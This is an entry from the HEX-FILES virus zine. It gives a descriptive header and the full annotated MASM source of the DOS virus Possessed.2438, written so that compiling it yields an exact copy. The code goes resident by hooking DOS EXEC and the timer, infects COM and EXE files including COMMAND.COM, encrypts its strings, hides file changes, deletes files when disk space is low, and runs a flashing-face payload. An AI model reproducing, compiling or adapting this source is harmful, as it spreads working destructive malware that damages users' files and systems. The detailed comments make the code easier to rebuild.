HEX-FILES No. 2 File 006
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ

Virus: Possessed.2438
Alias: Possessed 1.06, Possessed II
Targets: COM, EXE

Resident: Low Memory TSR
MemorySize: 2944 bytes + environment
MemorySelfRec: [0:1EC] <> 0

VirusLength: 2438 bytes
InfectiveLength:
COM: 2438 bytes
EXE: 2438 + 15 byte alignment
LocationVirusOnFile:
End of file
FileSelfRec:
COM: File[Eof-1067..Eof-1066] = 41h 4bh
EXE: File[18..19] = 70h 19h
ReadableText:
"POSSESSED! Bwa! ha! ha! ha! ha!$
Author: Author: A. Gumba & E. Daya of AdU"

"*.COM *.EXE"
EncryptedText:
"POSSESSED! Bwa! ha! ha! ha! ha!$
Author: Author: A. Gumba & E. Daya of AdU"

"COMMAND.COM"
DisplayedText:
If host program EXEC failed

"POSSESSED! Bwa! ha! ha! ha! ha!"

Payload: Flashing face
PayloadTrigger: After 4 hours if it became resident through COMMAND.COM;
After 1 hour from other programs



ÄÄ POS2438.ASM STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

;-------------------------------------------------------------------
; *WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*
; *WARNING WARNING*
; *WARNING destructive codes intentional damage WARNING*
; *WARNING deletes files WARNING*
; *WARNING WARNING*
; *WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*
;-------------------------------------------------------------------
; Virus: Possessed.2438
; Alias: Possessed 1.06, Possessed II
; Author: JonJon Gumba and E. Daya
; Origin: Adamson University, Manila, Philippines
;-------------------------------------------------------------------
;
; This source code is written in a way so that when compiled you will
; get an exact copy of the virus.
;
; You will only be able to duplicate the original virus if you will
; use *MASM 5.0* to compile this program listing. Other compilers or
; versions of a compiler might produce a virus different from that
; originally released.
;
; If compiled in tasm 2.01, two bytes will differ from the original
; virus, that is, compiled by masm 5.0 This can also be compiled in
; a86 4.02 but you will be creating a new variant.
;
; Compile to COM.
;
;-------------------------------------------------------------------
; Program listing created by Putoksa Kawayan. HEX-FILES No. 2
;-------------------------------------------------------------------
;
; First 24 bytes of a DOS MZ (EXE) header. isExeFile rewrites the entry
; point and stack through this layout; the checksum word doubles as the
; infection marker checked in SetInfect.
ExeHeader struc
isExeId dw ?                 ; 'MZ' signature (compared as the word 'ZM')
isMod dw ?                   ; bytes used in the last 512-byte page
isBlocks dw ?                ; number of 512-byte pages in the file
isRelocItemCt dw ?
isHeaderSize dw ?            ; header size in paragraphs
isMinAlloc dw ?
isMaxAlloc dw ?
isSs dw ?                    ; initial SS, relative to the load segment
isSp dw ?
isCxSum dw ?                 ; checksum word (file offset 18); 1970h here marks an infected EXE
isIp dw ?
isCs dw ?                    ; initial CS, relative to the load segment
ExeHeader ends

Possessed segment 'code'
assume cs:Possessed, ds:nothing

org 0                        ; all offsets are relative to the virus image, not to a PSP

; 0000:01ECh is inside the interrupt vector table; a nonzero byte there is
; the "already resident" marker (the MemorySelfRec value in the header).
; The two words below it hold SS:SP across every DOS call made through
; UseDos, so the int 24h handler (isError) can unwind to them.
MemoryMarkerLoc equ 01ech
SaveSsOnInt21 equ 01f6h
SaveSpOnInt21 equ 01f4h

; Entry point of the first-generation (dropper) image. The pushed ES is the
; PSP segment, which FirstGenerationEntry pops to compute the new CS; ES=0
; is needed there to set the marker byte.
PossessedEntry:
push es
xor ax,ax
mov es,ax
jmp FirstGenerationEntry

; Plain-text ID string ('$'-terminated for int 21h/09h). Filled in from
; EncryptedPossessedId at install time; printed only when EXEC of the host
; fails (see VictimExecuted) and copied into the head of infected COM files.
PossessedId db 13,'POSSESSED! Bwa! ha! ha! ha! ha!$',8,32,10
db 13,'Author: A. Gumba & E. Daya of AdU',10,26

; Target of the int 21h vector installed by SetUpPossessed.
isDos:
jmp DosHandler

DosVersion db ?              ; major DOS version (int 21h/30h), read in isTerminate
FirstGenerationFlag db 1     ; 1 only in the dropper; cleared on its first run

DosInterrupt label dword     ; original int 21h vector; also used as a scratch far pointer by ExeEntry / ExeNotInMemory
DosIntOffset dw ?
DosIntSegment dw ?

ClockInterrupt label dword   ; original int 08h (timer tick) vector
ClockIntOffset dw ?
ClockIntSegment dw ?

ErrorIntOffset dw ?          ; original int 24h vector, saved when a file is processed
ErrorIntSegment dw ?
VictimAsciizSegment dw ?     ; far pointer to the victim's ASCIIZ path
VictimAsciizOffset dw ?
Attribute dw ?               ; victim's original attributes (restored in DoneWithFile)
Handle dw ?                  ; open handle of the victim
FileTime dw ?                ; victim's original timestamp (restored in DoneWithFile)
FileDate dw ?
ComLength dw ?               ; low word of the victim's file size
AllocatedMemory dw ?         ; segment of the buffer that holds the victim image
Timer dw ?                   ; tick counter; wraps every 65536 ticks
Hour db ?                    ; Timer wraps left before the payload fires
ActivateLength db ?          ; 4 when the victim is COMMAND.COM, else 1
ViruSs dw ?                  ; SS:SP saved around EXEC of the host
ViruSp dw ?
ExeSs dw ?                   ; host EXE's original SS/SP/CS/IP (SS and CS stored +16, see isExeFile)
ExeSp dw ?
ExeCs dw ?
ExeIp dw ?
ExeLengthLo dw ?             ; paragraph-aligned length of the original EXE image
ExeLengthHi dw ?
Environment dw ?             ; environment segment (PSP:2Ch) of the resident copy
Psp dw ?                     ; PSP segment of the resident copy

; int 21h hook. Only AX=4B00h (EXEC: load and execute) is intercepted;
; every other call goes straight to the original handler. On an EXEC it
; first infects one *.COM (or, failing that, *.EXE) found in the current
; directory of the drive named in the program path, then the program that
; is being executed. All registers are saved and restored around this.
DosHandler:
pushf
cmp ax,4b00h
jne PassToDos
push ds
push es
push si
push di
push ax
push bx
push cx
push dx
mov bx,dx
mov bl,[bx]                  ; first char of the caller's DS:DX path (taken to be the drive letter)

assume cs:Possessed, ds:Possessed

push cs
pop ds
mov ComAsciiz,bl             ; patch the drive letter into the 'C:*.COM' / 'C:*.EXE' masks
mov ExeAsciiz,bl
mov ah,2fh                   ; get the caller's DTA (ES:BX) and keep it on the stack
call UseDos
push es
push bx
mov ah,1ah                   ; temporary DTA: the SaveVictimCode buffer inside the virus
mov dx,offset SaveVictimCode
call UseDos
mov cx,21h                   ; find first, attributes read-only + archive
mov dx,offset ComAsciiz
mov ah,4eh
call UseDos
jnc InfectOthersFirst
mov dx,offset ExeAsciiz
mov ah,4eh
call UseDos
jnc InfectOthersFirst
InfectExecutingProgram:
pop dx                       ; restore the caller's DTA ...
pop ds
mov ah,1ah
call UseDos
pop dx                       ; ... and the caller's registers, so DS:DX is the program path again
pop cx
pop bx
pop ax
pop di
pop si
pop es
pop ds
call SaveRegistersBeforeInfect ; infect the program being executed
jmp PassToDos
InfectOthersFirst:
mov dx,offset SaveVictimCode
add dx,28                    ; DTA+28: two bytes in front of the found file name (DTA+30)
mov bx,dx
mov cl,ComAsciiz
mov [bx],cl                  ; build "X:NAME.EXT" in place inside the DTA
mov byte ptr [bx+01],':'
call SaveRegistersBeforeInfect ; infect the found file first (DS = CS here)
jmp InfectExecutingProgram
; Save all registers and enter the infection routine; SetInfect's exit
; path ends in RestoreRegisters, whose 'ret' returns to this routine's caller.
SaveRegistersBeforeInfect:
push ds
push es
push si
push di
push ax
push bx
push cx
push dx
jmp SetInfect

assume cs:Possessed, ds:nothing

; Common return from the infection routine: pops the registers pushed by
; SaveRegistersBeforeInfect and returns to its caller.
RestoreRegisters:
pop dx
pop cx
pop bx
pop ax
pop di
pop si
pop es
pop ds
ret
; Pass the intercepted call on to the original int 21h handler.
PassToDos:
popf
jmp DosInterrupt
; Infection entry. DS:DX = ASCIIZ path of the file to process. Leaves only
; through RestoreRegisters (via RestoreErrorInterrupt or DoneWithFile).
SetInfect:
mov VictimAsciizSegment,ds
mov VictimAsciizOffset,dx
mov si,dx
add si,2                     ; skip the "X:" drive prefix
mov bx,si                    ; BX = start of the base name
; Scan to the terminating NUL; BX is moved past every '\' encountered.
CheckIfPathSeparator:
cmp byte ptr [si],'\'
jne CheckIfEndOfFileName
mov bx,si
inc bx
jmp CheckNextCharOfFileName
CheckIfEndOfFileName:
cmp byte ptr [si],0
je GotEndOfFileName
CheckNextCharOfFileName:
inc si
jmp CheckIfPathSeparator
; Error exit once int 24h has been hooked: put the original critical-error
; handler back and return.
RestoreErrorInterrupt:
mov ax,2524h
mov dx,ErrorIntOffset
mov ds,ErrorIntSegment
call UseDos
jmp RestoreRegisters
GotEndOfFileName:
mov si,bx
push cs
pop es
mov di,offset NameofVictim   ; keep the base name (13 bytes); it ends up inside the infected file too
mov cx,13
cld
repe movsb

assume cs:Possessed, ds:Possessed

push ds
push dx
push es
pop ds
mov ax,3524h                 ; save the int 24h vector and hook it with isError, which turns a
call UseDos                  ; critical error into a failed call (CF=1) instead of DOS's default handling
mov ErrorIntSegment,es
mov ErrorIntOffset,bx
mov ax,2524h
mov dx,offset isError
call UseDos

assume cs:Possessed, ds:nothing

pop dx
pop ds
mov ax,4300h                 ; get attributes into CX
call UseDos
Relay1:
jc RestoreErrorInterrupt

mov Attribute,cx
mov ax,4301h                 ; set attributes to archive only (clears read-only)
mov cx,20h
call UseDos
jc Relay1
mov ax,3d02h                 ; open read/write
call UseDos
jc Relay1

mov Handle,ax
mov bx,ax
mov ax,5700h                 ; get time/date so they can be put back afterwards
call UseDos

mov FileDate,dx

mov FileTime,cx
mov bx,-2                    ; ask for 0FFFEh paragraphs: fails and returns the largest free block in BX ...
mov ah,48h
call UseDos
jnc EnoughMemory
mov ah,48h                   ; ... then allocate that block for the file image
call UseDos
jc Relay1

EnoughMemory:
mov AllocatedMemory,ax
xor cx,cx
mov dx,cx

mov bx,Handle
mov ax,4202h                 ; seek to end: DX:AX = file size
call UseDos
jc Relay2
mov ComLength,ax             ; only the low word is kept
call MovePointerBegin
Relay2:
jc Relay3
mov cx,ComLength
xor dx,dx
mov ds,AllocatedMemory
mov ah,3fh                   ; read ComLength bytes of the file to AllocatedMemory:0
call UseDos
Relay3:
jc DoneWithFile
push cs
pop es
xor si,si
cmp word ptr [si],'ZM'       ; MZ signature -> EXE
jne InfectCheckCom
cmp word ptr [si].isCxSum,1970h ; EXE already infected when the checksum word is 1970h
je DoneWithFile
jmp NotInfected

; COM marker: the word at (length - 1067) equals 41h 4Bh, the first two
; FaceData bytes of an appended virus. A file shorter than that is treated
; as clean.
InfectCheckCom:
mov si,cx
sub si,(offset VirusStack-offset FaceData)
js Relay4
cmp word ptr [si],4b41h
je DoneWithFile
Relay4:
jmp NotInfected

; Common exit: release the buffer, put the original time/date and
; attributes back (so the directory entry does not betray the change),
; close, and return. Note that int 24h is NOT restored on this path -- only
; RestoreErrorInterrupt does that -- so after the first file is processed
; the int 24h vector stays pointed at isError in the resident copy.
DoneWithFile:
mov es,AllocatedMemory
mov ah,49h                   ; free the file buffer
call UseDos
mov bx,Handle
mov dx,FileDate
mov cx,FileTime
mov ax,5701h                 ; restore time/date
call UseDos
mov ah,3eh                   ; close
call UseDos
mov ds,VictimAsciizSegment
mov dx,VictimAsciizOffset
mov cx,Attribute
mov ax,4301h                 ; restore attributes
call UseDos
jmp RestoreRegisters
; The file is clean. Decide whether it is COMMAND.COM (longer payload delay,
; overwritten in place later, DOS 3+ only) and whether the drive has room;
; otherwise the file is deleted.
NotInfected:
push es
mov ds,VictimAsciizSegment
mov si,VictimAsciizOffset
mov dl,[si]
sub dl,'A'-1                 ; drive letter -> 1-based drive number for int 21h/36h

assume cs:Possessed, ds:Possessed

pop ds
mov ActivateLength,1         ; default: payload after one Timer wrap
mov si,offset EncryptedCommandCom
mov cx,11
mov al,17h
call Scrambler               ; decode "COMMAND.COM" in place ...
mov di,offset NameofVictim
call Compare                 ; ... compare it with the victim's base name (CF=1 if different) ...
pushf
neg al
call Scrambler               ; ... and re-encode it, keeping the comparison result in the flags
popf
jc CheckDiskSpace
cmp DosVersion,3             ; COMMAND.COM is only infected on DOS 3 or later
jnc SetActivateTime
Relay5:
jmp DoneWithFile
SetActivateTime:
mov ActivateLength,4         ; COMMAND.COM: four Timer wraps, and the free-space check is skipped
jmp EnoughDiskSpace

; int 21h/36h: AX = sectors/cluster, BX = free clusters, CX = bytes/sector.
; Approximate free bytes (only the low word of the first product feeds the
; second multiply); below 2500 the victim is deleted instead of infected.
CheckDiskSpace:
mov ah,36h
call UseDos
xor dx,dx
mul bx
mul cx
or dx,dx
jne EnoughDiskSpace
cmp ax,2500
jnc EnoughDiskSpace
jmp DeleteFile

assume cs:Possessed, ds:nothing

; Rewind the file and dispatch on the type of the image in the buffer.
EnoughDiskSpace:
mov bx,Handle
call MovePointerBegin
jc Relay5

mov ds,AllocatedMemory
xor si,si
cmp word ptr [si],'ZM'
jne isComFile
jmp isExeFile

; 16-byte stub that replaces the first bytes of an infected COM file and
; runs at PSP:100h: BX = offset of ComEntry inside the appended virus,
; SI = LocEndOfFile, then jump. The two words are read from 10Ch/10Eh,
; i.e. right behind the jmp, which is why the operands carry +100h.
Jumper:
mov bx,cs:[100h+(LocComEntry-Jumper)]
mov si,cs:[100h+(LocEndOfFile-Jumper)]
jmp bx

LocComEntry dw ?             ; both filled in by isComFile before the stub is copied
LocEndOfFile dw ?

assume cs:Possessed, ds:Possessed

; COM infection. On entry DS = file buffer, ES = CS, SI = 0.
; The first 90 bytes of the victim are saved into the virus (ComEntry puts
; them back at run time) and replaced by the Jumper stub plus the ID text;
; the virus body is then appended (or, for COMMAND.COM, overwrites the tail).
isComFile:
push ds
push ds
mov di,offset SaveVictimCode ; copy the victim's first 90 bytes into SaveVictimCode
mov cx,(offset VirusStack-offset SaveVictimCode)/2
cld
repe movsw
pop es                       ; ES = file buffer
push cs
pop ds
mov dx,ComLength
cmp ActivateLength,4
jne ComNotCommand
; COMMAND.COM: the file length is kept; the last 2438 bytes are overwritten.
mov LocEndOfFile,dx
sub dx,-((ComEntry-VirusStack)+100h)   ; = length - (VirusStack-ComEntry) + 100h
mov LocComEntry,dx
jmp JumperSet

; Any other COM: the virus is appended, entry = length + ComEntry + 100h.
ComNotCommand:
push dx
add dx,offset ComEntry+100h
mov LocComEntry,dx
pop dx
add dx,offset VirusStack
mov LocEndOfFile,dx
JumperSet:
mov si,offset Jumper         ; buffer[0..15] = Jumper stub with its two words ...
xor di,di
mov cx,(isComFile-Jumper)/2
cld
repe movsw
mov si,offset PossessedId    ; ... followed by the plain-text ID string
mov cx,(isDos-PossessedId)/2
cld
repe movsw
call MovePointerBegin

assume cs:Possessed, ds:nothing

pop ds                       ; DS = file buffer
mov cx,ComLength
cmp ActivateLength,4
jne NotCommandCom
sub cx,offset VirusStack     ; COMMAND.COM: write back everything except the last 2438 bytes
NotCommandCom:
xor dx,dx
mov ah,40h                   ; write the patched image ...
call UseDos
jnc WriteOk
Relay6:
jmp Relay5
WriteOk:
push cs
pop ds
mov dx,offset PossessedEntry ; ... then the 2438-byte virus body, taken from the resident image
mov cx,offset VirusStack
mov ah,40h
call UseDos
jc Relay6
jmp DoneWithFile

; Destructive branch (see the WARNING block at the top): reached from
; CheckDiskSpace when the free-space estimate is below 2500 bytes. The
; victim is deleted (int 21h/41h) instead of being infected.
DeleteFile:
mov ds,VictimAsciizSegment
mov dx,VictimAsciizOffset
mov ah,41h
call UseDos
jmp DoneWithFile

; Scratch words for the payload, placed 100h bytes past Environment / Psp in
; the resident image. NOTE(review): they overlap whatever sits at those
; offsets; nothing reads that memory afterwards because ShowTime never returns.
PixelRow equ Environment+100h
PixelColumn equ Psp+100h

; int 08h (timer tick) hook. Timer wraps every 65536 ticks (roughly one
; hour at 18.2 Hz); each wrap decrements Hour, which SetUpPossessed loaded
; from ActivateLength. When Hour reaches 0 the payload runs.
isClock:
pushf
inc Timer
jne NotYetTime
dec Hour
je ShowTime
NotYetTime:
popf
jmp ClockInterrupt
; Payload: switch to video mode 6 (640x200) and draw/erase the face at five
; alternating offsets forever (the flashing face). This loop never exits.
ShowTime:
popf
mov ax,6
int 10h

assume cs:Possessed, ds:Possessed

push cs
pop ds
xor bx,bx
xor dx,dx
LoadFaceData:
mov si,offset FaceData
mov word ptr PixelRow,200
mov word ptr PixelColumn,0
call ShowPayload
mov word ptr PixelRow,201
mov word ptr PixelColumn,1
call ShowPayload
mov word ptr PixelRow,189
mov word ptr PixelColumn,-1
call ShowPayload
mov word ptr PixelRow,201
mov word ptr PixelColumn,-1
call ShowPayload
mov word ptr PixelRow,189
mov word ptr PixelColumn,1
call ShowPayload
jmp LoadFaceData
; Draw the FaceData point list twice: with colour 1, then with colour 0
; (erase). Each entry is two bytes added to PixelRow / PixelColumn; a first
; byte of 0 ends the list. int 10h/0Ch takes CX = column and DX = row, so
; PixelRow is in fact added to the column and PixelColumn to the row.
ShowPayload:
push si
mov al,1
mov cx,2
EraseFace:
push cx
push si
SetNextCoordinate:
mov bl,[si]
or bl,bl
je EndFaceData
mov cx,bx
add cx,PixelRow
mov dl,[si+1]
add dx,PixelColumn
mov ah,0ch
int 10h
add si,2
jmp SetNextCoordinate
EndFaceData:
pop si
xor al,al
pop cx
loop EraseFace
pop si
ret

assume cs:Possessed, ds:nothing

; EXE infection. DS:SI = MZ header in the file buffer. The virus is appended
; at the paragraph-aligned end of the original image, the header entry point
; and stack are redirected into it, and the original SS/SP/CS/IP are kept in
; the virus so ExecuteExeVictim can restore them.
isExeFile:
mov word ptr [si].isCxSum,1970h   ; infection marker
mov ax,[si].isSs
add ax,16                    ; +16 turns the load-segment-relative value into a PSP-relative one;
mov ExeSs,ax                 ; ExecuteExeVictim adds the PSP back
mov ax,[si].isSp
mov ExeSp,ax
mov ax,[si].isIp
mov ExeIp,ax
mov ax,[si].isCs
add ax,16
mov ExeCs,ax
; Original image length = isBlocks*512 (one page less if isMod<>0) + isMod,
; rounded up to a paragraph ("2438 + 15 byte alignment" in the header).
mov ax,[si].isBlocks
cmp word ptr [si].isMod,0
je PageAligned
dec ax
PageAligned:
mov bx,512
mul bx
add ax,[si].isMod
adc dx,0
add ax,15
adc dx,0
and ax,0fff0h
mov ExeLengthLo,ax
mov ExeLengthHi,dx
add ax,offset VirusStack     ; new length = aligned length + 2438
adc dx,0
jc Relay7                    ; 32-bit overflow: give up (the marker was only set in the buffer)
div bx                       ; new page count and last-page remainder
or dx,dx
je AlignedToPage
inc ax
AlignedToPage:
mov [si].isBlocks,ax
mov [si].isMod,dx
mov ax,ExeLengthLo
mov dx,ExeLengthHi
mov bx,16
div bx                       ; paragraph of the appended virus relative to the file start ...
sub ax,[si].isHeaderSize     ; ... relative to the load segment ...
sub ax,16                    ; ... minus 16, so the virus appears at CS:100h
mov [si].isCs,ax
mov word ptr [si].isIp,offset ExeEntry+100h
mov [si].isSs,ax
mov word ptr [si].isSp,offset VirusStack+100h   ; stack starts at the end of the virus image
mov bx,Handle
call MovePointerBegin
mov cx,28                    ; write the patched 28-byte header back
xor dx,dx
mov ah,40h
call UseDos

assume cs:Possessed, ds:Possessed

push cs
pop ds
mov dx,ExeLengthLo
mov cx,ExeLengthHi
mov ax,4200h                 ; seek to the aligned end of the original image ...
call UseDos
mov dx,offset PossessedEntry ; ... and append the 2438-byte virus body
mov cx,offset VirusStack
mov ah,40h
call UseDos
Relay7:
jmp DoneWithFile

assume cs:Possessed, ds:nothing

; int 24h (critical error) handler. Instead of returning to DOS it reloads
; the SS:SP that UseDos stashed at 0:1F4h/0:1F6h, pops the ax/es/bp that
; UseDos pushed, and returns to UseDos's caller with CF=1, so the failed
; DOS call simply looks like an error return.
isError:
xor ax,ax
mov es,ax
mov ss,es:SaveSsOnInt21
mov sp,es:SaveSpOnInt21
pop ax
pop es
pop bp
stc
ret
; Issue a DOS call through the saved original int 21h vector (this bypasses
; the virus's own hook and anything hooked after it). SS:SP are stored at
; 0:1F4h/0:1F6h first so isError can unwind. Registers are the DOS call's.
UseDos:
push bp
push es
push ax
xor ax,ax
mov es,ax
mov es:SaveSpOnInt21,sp
mov es:SaveSsOnInt21,ss
pop ax
pop es
pushf                        ; pushf + far call == an int 21h into the original handler
call DosInterrupt
pop bp
ret

; Seek handle BX to offset 0 (int 21h/4200h, CX:DX = 0); CF from DOS.
MovePointerBegin:
xor cx,cx
mov dx,cx
mov ax,4200h
call UseDos
ret

; Set cursor position on page 0 (int 10h/02h, DH/DL = row/column).
; Not referenced anywhere in this listing; kept so the image stays byte-exact.
MoveCursor:
mov ah,2
xor bx,bx
int 10h
ret

; Subtract AL from each of CX bytes at DS:SI (the text "encryption" used for
; the strings below). SI and CX are preserved. Called with the key to decode
; and with -AL (after 'neg al') to re-encode the same buffer.
Scrambler:
push cx
push si
Masker:
sub [si],al
inc si
loop Masker
pop si
pop cx
ret

; Compare CX bytes at DS:SI with ES:DI. CF=1 if they differ, CF=0 after a
; full match. SI and CX are preserved; DI is advanced by the compare.
Compare:
push si
push cx
cld
repe cmpsb
je MatchFound
stc
MatchFound:
pop cx
pop si
ret

; "COMMAND.COM" with 17h added to every byte; decoded transiently by NotInfected.
EncryptedCommandCom db 'C'+17h,'O'+17h,'M'+17h,'M'+17h,'A'+17h
db 'N'+17h,'D'+17h,'.'+17h,'C'+17h,'O'+17h
db 'M'+17h

; The ID string with 25h added to every byte; decoded into PossessedId by
; SetUpPossessed (and re-encoded here afterwards).
EncryptedPossessedId db 13+25h,'P'+25h,'O'+25h,'S'+25h,'S'+25h
db 'E'+25h,'S'+25h,'S'+25h,'E'+25h,'D'+25h
db '!'+25h,' '+25h,'B'+25h,'w'+25h,'a'+25h
db '!'+25h,' '+25h,'h'+25h,'a'+25h,'!'+25h
db ' '+25h,'h'+25h,'a'+25h,'!'+25h,' '+25h
db 'h'+25h,'a'+25h,'!'+25h,' '+25h,'h'+25h
db 'a'+25h,'!'+25h,'$'+25h,8+25h,32+25h,10+25h
db 13+25h,'A'+25h,'u'+25h,'t'+25h,'h'+25h
db 'o'+25h,'r'+25h,':'+25h,' '+25h,'A'+25h
db '.'+25h,' '+25h,'G'+25h,'u'+25h,'m'+25h
db 'b'+25h,'a'+25h,' '+25h,'&'+25h,' '+25h
db 'E'+25h,'.'+25h,' '+25h,'D'+25h,'a'+25h
db 'y'+25h,'a'+25h,' '+25h,'o'+25h,'f'+25h
db ' '+25h,'A'+25h,'d'+25h,'U'+25h,10+25h
db 26+25h

;----------------------------
;--------------Possessed payload data
;----------------------------
; Point list drawn by ShowPayload: byte pairs (added to PixelRow and to
; PixelColumn respectively), terminated by a 0 first byte. The first pair,
; 41h 4Bh, doubles as the COM infection marker checked in InfectCheckCom.
FaceData label byte
db 41h,4bh,42h,4bh,42h,4ch,43h,4ch,44h,4ch,45h,4ch,43h,4dh,46h
db 4dh,47h,4dh,44h,4eh,48h,4eh,49h,4eh,4ah,4eh,45h,4fh,4bh,4fh
db 4ch,4fh,0b6h,4ah,0b5h,4ah,0b5h,4bh,0b4h,4bh,0b3h,4bh,0b2h,4bh,0b4h
db 4ch,0b1h,4ch,0b0h,4ch,0b3h,4dh,0afh,4dh,0aeh,4dh,0adh,4dh,0b2h,4eh
db 0ach,4eh,0abh,4eh,4ch,54h,4ch,55h,4dh,55h,4eh,55h,4fh,56h,50h
db 56h,51h,56h,52h,56h,53h,56h,54h,57h,55h,57h,56h,57h,57h,57h
db 58h,57h,59h,58h,5ah,58h,5bh,58h,5ch,58h,5dh,58h,5ah,59h,5bh
db 59h,5ch,59h,5dh,59h,60h,59h,5fh,59h,60h,59h,61h,59h,62h,59h
db 5bh,5ah,5ch,5ah,63h,5ah,64h,5ah,65h,5ah,66h,5ah,67h,5ah,5ch
db 5bh,68h,5bh,69h,5bh,6ah,5bh,6bh,5bh,6ch,5bh,6dh,5ch,6eh,5ch
db 6fh,5ch,70h,5dh,0b1h,53h,0b0h,54h,0afh,54h,0aeh,54h,0adh,55h,0ach
db 55h,0abh,55h,0aah,55h,0a9h,55h,0a8h,55h,0a7h,56h,0a6h,56h,0a5h,56h
db 0a4h,56h,0a3h,56h,0a2h,57h,0a1h,57h,0a0h,57h,9fh,57h,9eh,57h,9dh
db 57h,9ch,58h,9bh,58h,9ah,58h,99h,58h,98h,58h,9ah,59h,99h,59h
db 98h,59h,97h,59h,96h,59h,95h,59h,94h,59h,93h,59h,92h,59h,99h
db 5ah,98h,5ah,91h,5ah,90h,5ah,8fh,5ah,8eh,5ah,8dh,5ah,98h,5bh
db 8ch,5bh,8bh,5bh,8ah,5bh,89h,5bh,88h,5bh,87h,5bh,86h,5ch,85h
db 5ch,84h,5ch,83h,5ch,76h,63h,75h,64h,75h,65h,74h,66h,74h,67h
db 73h,68h,73h,69h,72h,6ah,71h,6bh,71h,6ch,70h,6dh,70h,6eh,6fh
db 6fh,6eh,70h,6eh,71h,7bh,71h,6dh,72h,7ah,72h,79h,72h,6dh,73h
db 78h,73h,77h,73h,76h,73h,75h,73h,6ch,74h,71h,74h,72h,74h,73h
db 74h,74h,74h,6ch,75h,6dh,75h,6eh,75h,6fh,75h,70h,75h,6bh,76h
db 6ch,76h,6dh,81h,6eh,81h,6fh,81h,70h,80h,71h,80h,72h,80h,73h
db 80h,74h,7fh,75h,7fh,76h,7fh,77h,7fh,78h,7eh,79h,7eh,7ah,7eh
db 7bh,7eh,7ch,7dh,7dh,7dh,7eh,7dh,7fh,7dh,80h,7dh,81h,7ch,82h
db 7ch,83h,7ch,84h,7ch,85h,7bh,86h,7bh,87h,7bh,88h,7bh,89h,7ah
db 8ah,7ah,8bh,7ah,8ch,7ah,8dh,79h,8eh,79h,8fh,79h,90h,79h,91h
db 78h,92h,78h,93h,78h,94h,77h,95h,77h,96h,76h,97h,76h,98h,75h,0

; Find-first masks; DosHandler patches the drive letter in each.
ComAsciiz db 'C:*.COM',0
ExeAsciiz db 'C:*.EXE',0

; Entry point of an infected EXE. The patched header puts the virus at
; CS:100h, so every data reference below carries +100h; 'assume ds:nothing'
; is in effect here, so these references assemble as CS-relative.
ExeEntry:
push es                      ; ES = PSP
xor ax,ax
mov es,ax
cmp byte ptr es:MemoryMarkerLoc,0   ; already resident?
jne ExecuteExeVictim
mov si,100h                  ; not resident: install; SI = start of the virus image
jmp ExeNotInMemory

; Resident: rebuild the host's SS:SP and CS:IP (PSP + values saved at
; infection time) and far-jump to it through the DosInterrupt words, which
; serve as a scratch far pointer here.
ExecuteExeVictim:
pop es
mov ax,es

add ax,ExeSs+100h
mov ss,ax
mov sp,ExeSp+100h
mov ax,es
add ax,ExeCs+100h
mov DosIntSegment+100h,ax
mov ax,ExeIp+100h
mov DosIntOffset+100h,ax
clc
jmp DosInterrupt+100h

; Second half of the copy to PSP:100h, entered from the already-copied part
; of the image at PSP:SecondCodeMove+100h with CX bytes left (see
; ExeNotInMemory). Falls into the common install path with ES = 0.
SecondCodeMove:
cld
repe movsb
xor ax,ax
mov es,ax
; Common install entry (also reached directly by the dropper). Sets the
; resident marker, then switches to CS = PSP+16 (the PSP popped from the
; stack) so the org-0 offsets become valid, and continues at SetUpPossessed.
FirstGenerationEntry:
mov byte ptr es:MemoryMarkerLoc,1
pop ax
add ax,16
push ax
mov ax,offset SetUpPossessed
push ax
retf

assume cs:Possessed, ds:Possessed

; Resident installation. On entry CS = PSP+16, the whole image is at CS:0
; and the stack is still the host's. Hooks int 21h and int 08h, then goes
; TSR; execution continues at isTerminate through the patched PSP word.
SetUpPossessed:
mov ax,sp
sub ax,100h                  ; move the stack 256 bytes down, then SS = DS = CS
mov sp,ax
mov ax,cs
mov ds,ax
mov ss,ax
push ds
sub ax,16
mov es,ax                    ; ES = PSP
mov Psp,es
push ax
mov ax,es:[2ch]
mov Environment,ax           ; environment segment from the PSP
pop ax
push ds
push es
mov ds,ax                    ; DS = PSP
push cs
pop es
mov si,0ah                   ; save PSP words 0Ah..15h (terminate, Ctrl-Break and
mov di,offset VirusStack     ; critical-error addresses) into the VirusStack area ...
mov cx,6
cld
repe movsw
mov bx,offset isTerminate    ; ... and point the PSP terminate address at isTerminate, so the
mov ds:[0ah],bx              ; int 21h/31h call below "returns" into the virus rather than the parent
mov ds:[0ch],cs
pop es
pop ds
pop es
mov si,offset EncryptedPossessedId   ; decode the ID string into PossessedId, then re-encode the source
mov cx,(offset FaceData-offset EncryptedPossessedId)
push cx
mov al,25h
call Scrambler
mov di,offset PossessedId
push si
cld
repe movsb
pop si
pop cx
neg al
call Scrambler
mov ax,word ptr ds:ExeEntry  ; the first two code bytes of ExeEntry (06h 33h: push es / xor ax,ax) read as 3306h ...
add ax,(3521h-3306h)         ; ... so AX = 3521h, get int 21h vector. Any change to ExeEntry's encoding breaks this
int 21h                      ; (the MASM 5.0 caveat in the header)
mov DosIntOffset,bx
mov DosIntSegment,es
mov dx,offset isDos
sub ah,10h                   ; 2521h: hook int 21h, issued through the vector just saved
call UseDos
mov Timer,0
mov dl,ActivateLength
mov Hour,dl                  ; Timer wraps until the payload, fixed at infection time (see isClock)
add ax,(3508h-2521h)         ; 3508h: get int 08h vector (relies on AX still holding 2521h after the call)
call UseDos
mov ClockIntOffset,bx
mov ClockIntSegment,es
mov dx,offset isClock
sub ah,10h                   ; 2508h: hook the timer tick
call UseDos
push cs
pop ds
mov es,Psp                   ; int 21h/49h with ES = Psp. NOTE(review): this is Psp, not Environment;
mov ah,49h                   ; the header's "2944 bytes + environment" suggests the environment block stays -- confirm
call UseDos
mov dx,offset VirusStack     ; keep 2438/16 + 20h = 0B8h paragraphs (2944 bytes) resident
mov cl,4
shr dx,cl
add dx,20h
mov ah,31h                   ; TSR; control resumes at isTerminate via the patched PSP word
call UseDos
